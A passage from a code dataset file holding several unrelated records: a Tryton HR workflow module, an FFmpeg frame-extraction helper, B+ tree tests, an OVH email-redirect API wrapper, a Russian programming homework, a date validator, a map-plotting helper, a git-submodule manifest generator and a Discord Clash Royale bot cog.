'Scooter')\n # ], 'Select Type Of Vehicle', states={\n # 'invisible': ~Bool(Eval('vehicle')),\n # 'required': ~Bool(Eval('vehicle')),\n # }, depends=['vehicle'])\n \n # vehicle_regno = fields.Char('Vehicle Registration No.')\n # distance = fields.Selection(\n # [\n # ('1', '201-300 kilometers'),\n # ('2', '301-450 kilometers '),\n # ('3', '451-600 kilometers'),\n # ('3', '601-800 kilometers'),\n # ('3', 'Above 800 kilometers')\n # ], 'Select Travel Distance')\n\n state = fields.Selection(\n [\n ('draft', 'Draft'),\n ('confirm', 'Confirm'),\n ('account_officer', 'Account Officer'),\n ('cancel', 'Cancel'),\n ('approve', 'Approve'),\n \n ], 'Status', readonly=True)\n\n @classmethod\n def __setup__(cls):\n super().__setup__()\n cls._buttons.update({\n \"confirm\": {\n 'invisible': ~Eval('state').in_(\n ['draft'\n ]),\n },\n\n \"submit\": {\n 'invisible': ~Eval('state').in_(\n ['confirm'\n ]),\n },\n\n\n \"cancel\": {\n 'invisible': ~Eval('state').in_(\n ['draft', 'account_officer'\n ]),\n \n },\n\n \"approve\": {\n 'invisible': ~Eval('state').in_(\n ['account_officer'\n ]),\n \n },\n })\n cls._transitions |= set((\n ('draft', 'confirm'),\n ('draft', 'cancel'),\n ('confirm', 'account_officer'),\n ('account_officer', 'approve'),\n ('account_officer', 'cancel'),\n ))\n \n @staticmethod\n def default_state():\n return 'draft'\n\n @classmethod\n @ModelView.button\n @Workflow.transition('confirm')\n def confirm(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('account_officer')\n def submit(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('approve')\n def approve(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('cancel')\n def cancel(cls, records):\n pass\n\n @fields.depends('employee')\n def on_change_employee(self):\n if self.employee:\n self.salary_code = self.employee.salary_code\n self.designation = self.employee.designation\n self.department = self.employee.department\n\n @staticmethod\n def default_employee():\n global current_employee\n current_employee = None\n pool = Pool()\n Employee = pool.get('company.employee')\n employee_id = Transaction().context.get('employee')\n employee = Employee.search([\n ('id', '=', employee_id)\n ])\n if employee != []:\n current_employee = employee[0]\n return current_employee.id if current_employee else None\n \n\n # @fields.depends('vehicle', 'vehicle_selection')\n # def on_change_vehicle(self):\n # if self.vehicle != '1':\n # self.vehicle_selection = ''\n\n ","sub_path":"src/modules/customised/payroll_test_2/payroll_currupt/hr_conveyance/hr_conveyance.py","file_name":"hr_conveyance.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"68391697","text":"\"\"\"\nThe functions provided by this module are as follow:\n\n * key frame extraction\n\nBefore using this module, you must install moviepy from pip.\n\"\"\"\n\nimport subprocess\nfrom moviepy.editor import VideoFileClip\nimport os\n\n\ndef key_frame_extraction(video_path, output_image_path, output_image_size=None):\n \"\"\"\n Extracts key frames from a provided video using FFmpeg and writes the frames to output_image_path.\n It will launch FFmpeg.exe and provide cmd line parameters to complete the task. So you must make\n sure that FFmpeg.exe has been added to the environment variable or running directory.\n\n Warnings:\n If you want to use it in a production environment, you still need to consider many details. Some\n of them are:\n * Correctly handles error conditions.\n * Provides progress prompt.\n * Supports more flexible image output methods.\n\n :param video_path:\n The path of the video used to extract key frames.\n\n :param output_image_path:\n The output path of the key frame image. If the path is not ended by a character '/' or '\\',\n it will be added.\n\n :param output_image_size:\n The size of the key frame image. It will be a tuple or a list that contains width and height,\n such as [width, height] or (width, height). The default value of None means that the image\n size is consistent with the original video size.\n\n :return:None\n \"\"\"\n if output_image_size is None:\n clip = VideoFileClip(video_path)\n output_image_size = clip.size\n\n if output_image_path != '' and (output_image_path[-1] != '/' or output_image_path[-1] != '\\\\'):\n output_image_path += '/'\n\n if not os.path.exists(output_image_path):\n os.makedirs(output_image_path)\n\n out = subprocess.check_output(('G:/DrawMusic/FrameExtract', '-i', video_path, \"-o\",\n output_image_path + 'keyframe-%03d.png',\n \"-d\", \"0\", \"-S\", \"30\")).decode().split()\n\n print(out)\n return dict(enumerate(out))\n","sub_path":"ffmpeg_tools.py","file_name":"ffmpeg_tools.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"390549297","text":"import itertools\nimport os\n\nimport pytest\n\nfrom bplustree.memory import Memory, FileMemory, Fsync\nfrom bplustree.node import LonelyRootNode, LeafNode\nfrom bplustree.tree import BPlusTree\n\nfilename = '/tmp/bplustree-testfile.index'\n\n\n@pytest.fixture\ndef clean_file():\n if os.path.isfile(filename):\n os.unlink(filename)\n yield\n if os.path.isfile(filename):\n os.unlink(filename)\n\n\n@pytest.fixture\ndef b():\n b = BPlusTree()\n yield b\n b.close()\n\n\ndef test_create_in_memory(b):\n assert isinstance(b._mem, Memory)\n\n\ndef test_create_and_load_file(clean_file):\n b = BPlusTree(filename=filename)\n assert isinstance(b._mem, FileMemory)\n b.insert(5, b'foo')\n b.close()\n\n b = BPlusTree(filename=filename)\n assert isinstance(b._mem, FileMemory)\n assert b.get(5) == b'foo'\n b.close()\n\n\ndef test_initial_values():\n b = BPlusTree(page_size=512, value_size=128)\n assert b._tree_conf.page_size == 512\n assert b._tree_conf.order == 4\n assert b._tree_conf.key_size == 16\n assert b._tree_conf.value_size == 128\n b.close()\n\n\ndef test_partial_constructors(b):\n node = b.RootNode()\n record = b.Record()\n assert node._tree_conf == b._tree_conf\n assert record._tree_conf == b._tree_conf\n\n\ndef test_get_tree(b):\n b.insert(1, b'foo')\n assert b.get(1) == b'foo'\n assert b.get(2) is None\n assert b.get(2, 'bar') == 'bar'\n\n\ndef test_contains_tree(b):\n b.insert(1, b'foo')\n assert 1 in b\n assert 2 not in b\n\n\ndef test_len_tree(b):\n assert len(b) == 0\n b.insert(1, b'foo')\n assert len(b) == 1\n for i in range(2, 101):\n b.insert(i, str(i).encode())\n assert len(b) == 100\n\n\ndef test_length_hint_tree():\n b = BPlusTree(order=100)\n assert b.__length_hint__() == 49\n b.insert(1, b'foo')\n assert b.__length_hint__() == 49\n for i in range(2, 10001):\n b.insert(i, str(i).encode())\n assert b.__length_hint__() == 7242\n b.close()\n\n\ndef test_bool_tree(b):\n assert not b\n b.insert(1, b'foo')\n assert b\n\n\ndef test_iter_keys_values_items_tree(b):\n # Empty tree\n iter = b.__iter__()\n with pytest.raises(StopIteration):\n next(iter)\n\n # Insert in reverse...\n for i in range(1000, 0, -1):\n b.insert(i, str(i).encode())\n # ...iter in order\n previous = 0\n for i in b:\n assert i == previous + 1\n previous += 1\n\n # Test .keys()\n previous = 0\n for i in b.keys():\n assert i == previous + 1\n previous += 1\n\n # Test .values()\n previous = 0\n for i in b.values():\n assert int(i.decode()) == previous + 1\n previous += 1\n\n # Test .items()\n previous = 0\n for k, v in b.items():\n expected = previous + 1\n assert (k, int(v.decode())) == (expected, expected)\n previous += 1\n\n\ndef test_iter_slice(b):\n with pytest.raises(ValueError):\n next(b._iter_slice(slice(None, None, -1)))\n\n with pytest.raises(ValueError):\n next(b._iter_slice(slice(10, 0, None)))\n\n # Contains from 0 to 9 included\n for i in range(10):\n b.insert(i, str(i).encode())\n\n iter = b._iter_slice(slice(None, 2))\n assert next(iter).key == 0\n assert next(iter).key == 1\n with pytest.raises(StopIteration):\n next(iter)\n\n iter = b._iter_slice(slice(5, 7))\n assert next(iter).key == 5\n assert next(iter).key == 6\n with pytest.raises(StopIteration):\n next(iter)\n\n iter = b._iter_slice(slice(8, 9))\n assert next(iter).key == 8\n with pytest.raises(StopIteration):\n next(iter)\n\n iter = b._iter_slice(slice(9, 12))\n assert next(iter).key == 9\n with pytest.raises(StopIteration):\n next(iter)\n\n iter = b._iter_slice(slice(15, 17))\n with pytest.raises(StopIteration):\n next(iter)\n\n iter = b._iter_slice(slice(-2, 17))\n assert next(iter).key == 0\n\n # Contains from 10, 20, 30 .. 200\n b2 = BPlusTree(order=5)\n for i in range(10, 201, 10):\n b.insert(i, str(i).encode())\n\n iter = b._iter_slice(slice(65, 85))\n assert next(iter).key == 70\n assert next(iter).key == 80\n with pytest.raises(StopIteration):\n next(iter)\n\n b2.close()\n\n\ndef test_left_record_node_in_tree():\n b = BPlusTree(order=3)\n assert b._left_record_node == b._root_node\n assert isinstance(b._left_record_node, LonelyRootNode)\n b.insert(1, b'1')\n b.insert(2, b'2')\n b.insert(2, b'2')\n assert isinstance(b._left_record_node, LeafNode)\n b.close()\n\niterators = [\n range(0, 1000, 1),\n range(1000, 0, -1),\n list(range(0, 1000, 2)) + list(range(1, 1000, 2))\n]\norders = [3, 4, 50]\npage_sizes = [4096, 8192]\nkey_sizes = [4, 16]\nvalues_sizes = [4, 16]\nfile_names = [None, filename]\nmatrix = itertools.product(iterators, orders, page_sizes,\n key_sizes, values_sizes, file_names)\n\n\n@pytest.mark.parametrize('iterator,order,page_size,k_size,v_size,filename',\n matrix)\ndef test_insert_split_in_tree(iterator, order, page_size, k_size, v_size,\n filename, clean_file):\n inserted = set()\n\n b = BPlusTree(filename=filename, order=order, page_size=page_size,\n key_size=k_size, value_size=v_size, fsync=Fsync.NEVER)\n\n for i in iterator:\n b.insert(i, str(i).encode())\n inserted.add(i)\n\n if filename:\n # Reload tree from file before checking values\n b.close()\n b = BPlusTree(filename=filename, order=order, page_size=page_size,\n key_size=k_size, value_size=v_size)\n\n for x in inserted:\n assert b.get(x) == str(x).encode()\n\n b.close()\n","sub_path":"tests/test_tree.py","file_name":"test_tree.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"630368850","text":"#!/usr/bin/env python3\n\nimport os\nimport ovh\nimport pickle\n\nCACHE_FILE = 'cache.pickle'\n\nclass OvhConnect:\n def __init__(self, dom, appkey, secret, conskey):\n self.conskey = conskey\n self.secret = secret\n self.appkey = appkey\n self.dom = dom\n\n def __enter__(self):\n self.client = ovh.Client(\n endpoint='ovh-eu',\n application_key=self.appkey,\n application_secret=self.secret,\n consumer_key=self.conskey,\n )\n print(\"login successfull\")\n return OvhRedirectsApi(self.dom, self.client)\n\n def __exit__(self, type, value, traceback):\n pass\n\n\nclass OvhRedirectsApi:\n def __init__(self, domain, client):\n self.client = client\n self.domain = domain\n self.cached_redirects = {}\n self.read_cache()\n\n def add(self, origin, destination):\n return self.client.post('/email/domain/%s/redirection' % self.domain,\n _from=origin,\n to=destination,\n localCopy=False)\n\n def read_cache(self):\n if os.path.exists(CACHE_FILE):\n with open(CACHE_FILE, 'rb') as f:\n self.cached_redirects = pickle.load(f)['redirects']\n\n def write_cache(self):\n with open(CACHE_FILE, 'wb') as f:\n pickle.dump({'redirects': self.cached_redirects}, f)\n\n def get(self, id):\n if id in self.cached_redirects:\n return self.cached_redirects[id]\n else:\n red = self.fetch(id)\n self.cached_redirects[red['id']] = red\n self.write_cache()\n return red\n\n def fetch(self, id):\n print(\"fetching non-cached redirect %s \" % id)\n return self.client.get('/email/domain/%s/redirection/%s' % (self.domain, id))\n\n def remove(self, id):\n return self.client.delete('/email/domain/%s/redirection/%s' % (self.domain, id))\n\n def list(self):\n print(\"asking for redirs id list...\")\n ids = self.client.get('/email/domain/%s/redirection' % self.domain)\n print(\"asking for redirects for each id...\")\n list = [self.get(id) for id in ids]\n\n return list\n\n","sub_path":"ovhwrapper.py","file_name":"ovhwrapper.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"595571012","text":"\n__author__ = 'Ермиличев Никита Дмитриевич'\n\n# Задание-1:\n# Написать программу, выполняющую операции (сложение и вычитание) с простыми дробями.\n# Дроби вводятся и выводятся в формате:\n# n x/y ,где n - целая часть, x - числитель, у - знаменатель.\n# Дроби могут быть отрицательные и не иметь целой части, или иметь только целую часть.\n# Примеры:\n# Ввод: 5/6 + 4/7 (всё выражение вводится целиком в виде строки)\n# Вывод: 1 17/42 (результат обязательно упростить и выделить целую часть)\n# Ввод: -2/3 - -2\n# Вывод: 1 1/3\n\nprint(\"\"\"\n#######################################\n# #\n# Задание 1 #\n# #\n#######################################\n\"\"\")\n\ndef get_result(formula):\n operation_dict = {\n 'sub': ' - ',\n 'add': ' + '\n }\n\n def get_main_operation(condition):\n if condition.find(' - ') > 0:\n return 'sub'\n if condition.find(' + ') > 0:\n return 'add'\n return False\n\n\n\n operator = get_main_operation(formula)\n\n if operator:\n operands = formula.split(operation_dict[operator])\n operand_list = []\n #есть ли целая часть\n for operand in operands:\n full = 0\n if ' ' in operand:\n full = int(operand.split(' ')[0])\n operand = operand.split(' ')[1]\n\n if '/' in operand:\n muls = list(map(int,operand.split('/')))\n else:\n muls = [int(operand),1]\n full = 0\n\n operand_list.append({\n 'full':full,\n 'operand':operand,\n 'muls': muls\n })\n\n\n val_1 = operand_list[0]['full'] + operand_list[0]['muls'][0] / operand_list[0]['muls'][1]\n val_2 = operand_list[1]['full'] + operand_list[1]['muls'][0] / operand_list[1]['muls'][1]\n\n formula_result = eval(str(val_1) + operation_dict[operator] + str(val_2))\n\n new_full_part = int(formula_result)\n new_dec_part = formula_result - int(formula_result)\n\n mul2 = operand_list[0]['muls'][1] * operand_list[1]['muls'][1]\n mul1 = round(new_dec_part * mul2)\n\n result_string = '';\n\n if new_full_part != 0:\n result_string = str(new_full_part)+' ';\n\n if mul1 != 0:\n result_string += str(mul1)+'/'+str(mul2)\n\n return result_string\n\n#заменить на input\nprint(\"5/6 + 4/7 =\", get_result(\"5/6 + 4/7\"))\nprint(\"-2/3 - -2 =\", get_result(\"-2/3 - -2\"))\nprint(\"4 -2/3 - -2 =\", get_result(\"4 -2/3 - -2\"))\n\n# Задание-2:\n# Дана ведомость расчета заработной платы (файл \"data/workers\").\n# Рассчитайте зарплату всех работников, зная что они получат полный оклад,\n# если отработают норму часов. Если же они отработали меньше нормы,\n# то их ЗП уменьшается пропорционально, а за заждый час переработки\n# они получают удвоенную ЗП, пропорциональную норме.\n# Кол-во часов, которые были отработаны, указаны в файле \"data/hours_of\"\n\nprint(\"\"\"\n#######################################\n# #\n# Задание 2 #\n# #\n#######################################\n\"\"\")\n\nimport os\nimport json\n\ndef get_actual_salary(salary, plan, fact):\n if fact == 0:\n return 0\n return plan/fact*salary\n\nwith open(os.path.join(\"data\", \"workers.json\"), \"r\", encoding=\"UTF-8\") as file:\n worker_data = json.load(file)\n file.close()\n\nwith open(os.path.join(\"data\", \"hours_of.json\"), \"r\", encoding=\"UTF-8\") as file:\n hours_data = json.load(file)\n file.close()\n\nhours_worker = list(map(int, list(hours_data.keys())))\n\nfor worker in worker_data['workers']:\n if worker['id'] in hours_worker:\n hours = worker['hourRate']\n fact_hours = hours_data[str(worker['id'])]\n salary = worker['salary']\n fact_salary = get_actual_salary(salary, hours, fact_hours)\n\n print(f\"{worker['firstName']} {worker['lastName']} заработал: {fact_salary} (план: {hours}, факт: {fact_hours}, ЗП: {salary})\")\n else:\n print(f\"По сотруднику \\\"{worker['firstName']} {worker['lastName']}\\\" нет данных\")\n\n# Задание-3:\n# Дан файл (\"data/fruits\") со списком фруктов.\n# Записать в новые файлы все фрукты, начинающиеся с определенной буквы.\n# Т.е. в одном файле будут все фрукты на букву “А”, во втором на “Б” и т.д.\n# Файлы назвать соответственно.\n# Пример имен файлов: fruits_А, fruits_Б, fruits_В ….\n# Важно! Обратите внимание, что нет фруктов, начинающихся с некоторых букв.\n# Напишите универсальный код, который будет работать с любым списком фруктов\n# и распределять по файлам в зависимости от первых букв, имеющихся в списке фруктов.\n# Подсказка:\n# Чтобы получить список больших букв русского алфавита:\n# print(list(map(chr, range(ord('А'), ord('Я')+1))))\n#\nprint(\"\"\"\n#######################################\n# #\n# Задание 3 #\n# #\n#######################################\n\"\"\")\n\nimport os\nimport json\n\nwith open(os.path.join(\"data\", \"fruits\"), \"r\", encoding=\"UTF-8\") as file:\n fruits = file.read().split('\\n')\n file.close()\n\nfruits_dict = {}\nchar_list = list(map(chr, range(ord('А'), ord('Я')+1)))\n\nfor find_char in char_list:\n fruits_by_char = list(filter(lambda first: len(first) > 0 and first[0] == find_char, fruits))\n if(len(fruits_by_char) > 0):\n file_name = find_char+\"_fruits\"\n with open(os.path.join(\"data\", \"result_fruits\", file_name), \"w\", encoding=\"UTF-8\") as file:\n for fruit_item in fruits_by_char:\n file.write(f\"{fruit_item}\\n\")\n print(f\"Записан файл {file_name}. Количество фруктов: {len(fruits_by_char)}\")\n file.close()\n","sub_path":"lesson03/hw03_hard.py","file_name":"hw03_hard.py","file_ext":"py","file_size_in_byte":6967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"405481784","text":"#Ryan Jonnada\n#I pledge that I have abided by the Stevens Honor System\n\ndef main():\n is_valid = True\n months_w_31_days = [1,3,5,7,8,10,12]\n date= input('Enter a date in mm/dd/yyy format:')\n date_list = date.split('/')\n if len(date_list) !=3:\n is_valid = False\n else:\n month, day, year = date_list\n\n try:\n month = int(month)\n day = int(day)\n year = int(year)\n if month > 12 or month < 1 or day > 31 or day <1 or year < 1:\n is_valid = False\n elif month not in months_w_31_days and day == 31:\n is_valid = False\n\n except:\n is_valid = False\n\n if is_valid:\n print(\"That is a valid date.\")\n else:\n print(\"That is not a valid date.\")\n\nmain()\n \n","sub_path":"2020F_hw6_submissions/jonnadaryan/RyanJonnadaCh7P2.py","file_name":"RyanJonnadaCh7P2.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"429072817","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 28 21:04:38 2019\n\n@author: eebjw\n\"\"\"\n\nimport numpy as np\nimport cartopy.crs as ccrs\nfrom matplotlib.colors import BoundaryNorm\nimport cartopy\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\nimport cartopy.feature as cfeature\n\n'''Setup for maps'''\nproj = ccrs.PlateCarree(central_longitude=0) \nlakes_50m = cfeature.NaturalEarthFeature('physical', 'lakes', '50m',edgecolor='k',facecolor=cfeature.COLORS['water'])\nland_50m = cfeature.NaturalEarthFeature('physical', 'land', '50m',edgecolor='k',facecolor='none')\ncountries_50m = cartopy.feature.NaturalEarthFeature('cultural','admin_0_countries','50m',edgecolor='k',facecolor='none')\n\ndef plot_map(ax,X,Y,data,cmap,levels):\n \n norm = BoundaryNorm(levels, ncolors=cmap.N, clip=False)\n ax.set_extent([np.min(X), np.max(X), np.min(Y), np.max(Y)], proj)\n ax.coastlines('50m')\n ax.add_feature(land_50m, linewidth=0.5)\n ax.add_feature(countries_50m, linewidth=0.5) \n ax.add_feature(lakes_50m, linewidth=0.5)\n gl = ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True)\n gl.xlines = False\n gl.ylines = False\n gl.xlabels_top = False\n gl.ylabels_right = False\n gl.xlabel_style = {'size': 6, 'rotation': 90}\n gl.ylabel_style = {'size': 6}\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n im = ax.pcolormesh(X, Y, data, cmap=cmap, norm=norm)\n \n return ax,im","sub_path":"plot_map.py","file_name":"plot_map.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"467947512","text":"import pygit2\nimport argparse\nimport json\n\ndef format_component(submod):\n return {\"component\":{\"type\":\"git\",\"git\":{\"commitHash\":str(submod.head_id), \"repositoryUrl\":str(submod.url)}}}\n\ndef process_component(repo):\n return [repo.lookup_submodule(submod) for submod in repo.listall_submodules()]\n\ndef recursive_process(base_repo):\n processed_subs = []\n repos_to_process = [base_repo]\n while repos_to_process:\n repo = repos_to_process.pop()\n submodules = process_component(repo)\n processed_subs.extend(submodules)\n repos_to_process.extend([mod.open() for mod in submodules])\n return {\"Registrations\":[format_component(component) for component in processed_subs]}\n\ndef main(repo_path, output_file):\n repo = pygit2.Repository(repo_path)\n registrations = recursive_process(repo)\n with open(output_file, 'w') as f:\n json.dump(registrations, f, indent=4, sort_keys=True)\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"base_repository\", help=\"path to base repository to get registrations for.\")\n parser.add_argument(\"-o\", \"--output\", help=\"output file name.\", default=\"cgmanifest.json\")\n args = parser.parse_args()\n main(args.base_repository, args.output)\n\n","sub_path":"tools/python/get_submodules.py","file_name":"get_submodules.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"120503866","text":"import discord\nfrom discord.ext import commands\nfrom .utils.dataIO import dataIO, fileIO\nimport os\nfrom __main__ import send_cmd_help\nimport time\nimport clashroyale as clashroyaleAPI\n\nBOTCOMMANDER_ROLES = [\"Family Representative\", \"Clan Manager\",\n \"Clan Deputy\", \"Co-Leader\", \"Hub Officer\", \"admin\"]\n\ncreditIcon = \"https://i.imgur.com/TP8GXZb.png\"\ncredits = \"Bot by GR8 | Titan\"\n\n\nclass clashroyale:\n \"\"\"Live statistics for Clash Royale\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.auth = self.bot.get_cog('crtools').auth\n self.tags = self.bot.get_cog('crtools').tags\n self.clans = self.bot.get_cog('crtools').clans\n self.clash = clashroyaleAPI.RoyaleAPI(self.auth.getToken(), is_async=True)\n\n def getCards(self, maxPlayers):\n \"\"\"Converts maxPlayers to Cards\"\"\"\n cards = {\n \"50\": 25,\n \"100\": 100,\n \"200\": 400,\n \"1000\": 2000\n }\n return cards[str(maxPlayers)]\n\n def getCoins(self, maxPlayers):\n \"\"\"Converts maxPlayers to Coins\"\"\"\n coins = {\n \"50\": 175,\n \"100\": 700,\n \"200\": 2800,\n \"1000\": 14000\n }\n return coins[str(maxPlayers)]\n\n def emoji(self, name):\n \"\"\"Emoji by name.\"\"\"\n for emoji in self.bot.get_all_emojis():\n if emoji.name == name:\n return '<:{}:{}>'.format(emoji.name, emoji.id)\n return ''\n\n async def getClanEmoji(self, tag):\n \"\"\"Check if emoji exists for the clan\"\"\"\n clankey = await self.clans.getClanKey(tag)\n if clankey is not None:\n return await self.clans.getClanData(clankey, 'emoji')\n return self.emoji(\"clan\")\n\n def getLeagueEmoji(self, trophies):\n \"\"\"Get clan war League Emoji\"\"\"\n if trophies >= 3000:\n return self.emoji(\"legendleague\")\n elif trophies >= 1500:\n return self.emoji(\"goldleague\")\n elif trophies >= 600:\n return self.emoji(\"silverleague\")\n else:\n return self.emoji(\"bronzeleague\")\n\n async def getClanWarTrophies(self, tag):\n \"\"\"Check if war trophies exists for the clan\"\"\"\n clankey = await self.clans.getClanKey(tag)\n if clankey is not None:\n return await self.clans.getClanData(clankey, 'warTrophies')\n return None\n\n async def getClanLeader(self, members):\n \"\"\"Return clan leader from a list of members\"\"\"\n for member in members:\n if member.role == \"leader\":\n arenaFormat = member.arena.arena.replace(' ', '').lower()\n return \"{} {}\".format(self.emoji(arenaFormat), member.name)\n\n def sec2tme(self, sec):\n \"\"\"Converts seconds to readable time\"\"\"\n m, s = divmod(sec, 60)\n h, m = divmod(m, 60)\n\n if h is 0:\n if m is 0:\n return \"{} seconds\".format(s)\n else:\n return \"{} minutes, {} secs\".format(m, s)\n else:\n return \"{} hour, {} mins\".format(h, m)\n\n @commands.command(pass_context=True, aliases=['clashprofile'])\n async def clashProfile(self, ctx, member: discord.Member=None):\n \"\"\"View your Clash Royale Profile Data and Statstics.\"\"\"\n\n member = member or ctx.message.author\n\n await self.bot.type()\n try:\n profiletag = await self.tags.getTag(member.id)\n profiledata = await self.clash.get_player(profiletag)\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: cannot reach Clash Royale Servers. Please try again later.\")\n return\n except KeyError:\n await self.bot.say(\"You need to first save your profile using ``{}save #GAMETAG``\".format(ctx.prefix))\n return\n\n if profiledata.clan is None:\n clanurl = \"https://i.imgur.com/4EH5hUn.png\"\n else:\n clanurl = profiledata.clan.badge.image\n\n arenaFormat = profiledata.arena.arena.replace(' ', '').lower()\n\n embed = discord.Embed(color=0xFAA61A)\n embed.set_author(name=profiledata.name + \" (#\"+profiledata.tag+\")\", icon_url=clanurl, url=\"https://royaleapi.com/player/\"+profiledata.tag)\n embed.set_thumbnail(url=\"https://royaleapi.github.io/cr-api-assets/arenas/{}.png\".format(arenaFormat))\n embed.add_field(name=\"Trophies\", value=\"{} {:,}\".format(self.emoji(arenaFormat), profiledata.trophies), inline=True)\n embed.add_field(name=\"Highest Trophies\", value=\"{} {:,}\".format(self.emoji(arenaFormat), profiledata.stats.max_trophies), inline=True)\n embed.add_field(name=\"Level\", value=\"{} {}\".format(self.emoji(\"level\"), profiledata.stats.level), inline=True)\n if profiledata.clan is not None:\n embed.add_field(name=\"Clan {}\".format(profiledata.clan.role.capitalize()),\n value=\"{} {}\".format(await self.getClanEmoji(profiledata.clan.tag), profiledata.clan.name), inline=True)\n embed.add_field(name=\"Cards Found\", value=\"{} {}/86\".format(self.emoji(\"card\"), profiledata.stats.cards_found), inline=True)\n embed.add_field(name=\"Favourite Card\", value=\"{} {}\".format(self.emoji(profiledata.stats.favorite_card.name.replace(\" \", \"\")),\n profiledata.stats.favorite_card.name), inline=True)\n embed.add_field(name=\"Games Played\", value=\"{} {:,}\".format(self.emoji(\"battle\"), profiledata.games.total), inline=True)\n embed.add_field(name=\"Tourney Games Played\", value=\"{} {:,}\".format(self.emoji(\"tourney\"), profiledata.games.tournament_games), inline=True)\n embed.add_field(name=\"Wins/Draws/Losses\", value=\"{:,}/{:,}/{:,}\".format(profiledata.games.wins, profiledata.games.draws,\n profiledata.games.losses), inline=True)\n embed.add_field(name=\"War Day Wins\", value=\"{} {}\".format(self.emoji(\"warwin\"), profiledata.games.war_day_wins), inline=True)\n embed.add_field(name=\"Three Crown Wins\", value=\"{} {:,}\".format(self.emoji(\"3crown\"), profiledata.stats.three_crown_wins), inline=True)\n embed.add_field(name=\"Total Donations\", value=\"{} {:,}\".format(self.emoji(\"card\"), profiledata.stats.total_donations), inline=True)\n embed.add_field(name=\"Donations Recieved\", value=\"{} {:,}\".format(self.emoji(\"card\"), profiledata.stats.clan_cards_collected), inline=True)\n embed.add_field(name=\"Challenge Max Wins\", value=\"{} {}\".format(self.emoji(\"tourney\"), profiledata.stats.challenge_max_wins), inline=True)\n embed.add_field(name=\"Challenge Cards Won\", value=\"{} {:,}\".format(self.emoji(\"cards\"), profiledata.stats.challenge_cards_won), inline=True)\n embed.add_field(name=\"Tournament Cards Won\", value=\"{} {:,}\".format(self.emoji(\"cards\"), profiledata.stats.tournament_cards_won), inline=True)\n embed.set_footer(text=credits, icon_url=creditIcon)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True)\n async def chests(self, ctx, member: discord.Member=None):\n \"\"\"View your upcoming chest cycle for Clash Royale.\"\"\"\n\n member = member or ctx.message.author\n\n await self.bot.type()\n try:\n profiletag = await self.tags.getTag(member.id)\n profiledata = await self.clash.get_player_chests(profiletag)\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: cannot reach Clash Royale Servers. Please try again later.\")\n return\n except KeyError:\n await self.bot.say(\"You need to first save your profile using ``{}save #GAMETAG``\".format(ctx.prefix))\n return\n\n mapEmoji = {\n 'silver': 'silver',\n 'gold': 'gold',\n 'giant': 'giant',\n 'epic': 'epic',\n 'super magical': 'super',\n 'magical': 'magic',\n 'legendary': 'legendary'\n }\n\n valuechestText = ' '.join(profiledata.upcoming)\n for chest in mapEmoji.keys():\n valuechestText = valuechestText.replace(chest, self.emoji(mapEmoji[chest]))\n\n chestList = [\n \"{} +{}\".format(self.emoji(\"giant\"), profiledata.giant+1),\n \"{} +{}\".format(self.emoji(\"epic\"), profiledata.epic+1),\n \"{} +{}\".format(self.emoji(\"magic\"), profiledata.magical+1),\n \"{} +{}\".format(self.emoji(\"super\"), profiledata.super_magical+1),\n \"{} +{}\".format(self.emoji(\"legendary\"), profiledata.legendary+1),\n ]\n\n embed = discord.Embed(title=\"\", color=0xFAA61A, description=\"Your Upcoming chests.\")\n embed.set_thumbnail(url=\"https://cdn.discordapp.com/emojis/385784630227369985.png\")\n embed.set_author(name=\"{} (#{})\".format(member.name, profiletag))\n embed.add_field(name=\"Upcoming Chests\", value=valuechestText, inline=False)\n embed.add_field(name=\"Special Chests\", value=\" \".join(chestList), inline=False)\n embed.set_footer(text=credits, icon_url=creditIcon)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True, aliases=['clashdeck'])\n async def clashDeck(self, ctx, member: discord.Member=None):\n \"\"\"View yours or other's clash royale Deck\"\"\"\n\n member = member or ctx.message.author\n\n await self.bot.type()\n\n try:\n profiletag = await self.tags.getTag(member.id)\n profiledata = await self.clash.get_player(profiletag, keys=\"deckLink\")\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: cannot reach Clash Royale Servers. Please try again later.\")\n return\n except KeyError:\n await self.bot.say(\"You need to first save your profile using ``{}save #GAMETAG``\".format(ctx.prefix))\n return\n\n message = ctx.message\n message.content = ctx.prefix + \"deck gl \" + profiledata.deck_link\n message.author = member\n\n await self.bot.process_commands(message)\n\n @commands.command(pass_context=True)\n async def clan(self, ctx, clantag):\n \"\"\"View Clash Royale Clan statistics and information \"\"\"\n\n await self.bot.type()\n\n try:\n clandata = await self.clash.get_clan(clantag)\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: cannot reach Clash Royale Servers. Please try again later.\")\n 